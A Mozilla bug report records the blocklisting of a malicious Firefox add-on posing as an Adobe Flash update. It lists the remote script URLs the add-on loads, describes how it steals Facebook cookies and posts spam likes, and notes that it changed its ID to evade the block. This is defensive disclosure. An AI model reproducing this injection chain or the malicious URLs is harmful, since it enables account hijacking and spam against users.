Malicious "Adobe Flash 11.3 Update" add-on

RESOLVED FIXED

Status

()

Toolkit
Blocklisting
RESOLVED FIXED
6 years ago
7 days ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

7.63 KB, application/octet-stream
Details
(Reporter)

Description

6 years ago
Created attachment 592890 [details]
20120130 Adobe Update.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded the "Adobe Flash 11.3 Update" add-on from http://oibruvv.com/flash@adobe.com.xpi


Actual results:

After install, it injects main.js from the addon, which injects http://oibruvv.com/ffunctions.js

ffunctions.js injects a script tag to load http://oibruvv.com/track.php

Track.php which injects script tags to load 

http://oibruvv.com/likepage.php
http://oibruvv.com/wallpost.php

The likepage.php steals your FB cookies and sends likes.  It was configured to like this one 340392035980023

Wallpost.php is configurable, based on the GET params you pass to it.  It will build a custom JS file with your spam message and URL.



Expected results:

It shouldn't steal cookies from the browser and send likes to Facebook without the user's knowledge.
(Assignee)

Comment 1

6 years ago
Id: flash@adobe.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

6 years ago
The id is safe to block, as far as I can see.

https://addons.mozilla.org/en-US/firefox/blocked/i56
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED

Comment 3

6 years ago
This add-on changes its ID to avoid the blocklisting: flashupdate@adobe.com
See http://www.geckozone.org/forum/viewtopic.php?f=5&t=103030&p=678608#p678589
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
(Assignee)

Comment 4

6 years ago
Please file a new bug when it has a different ID. It's easier for us to track.
https://addons.mozilla.org/en-US/firefox/blocked/i68
Status: REOPENED → RESOLVED
Last Resolved: 6 years ago6 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.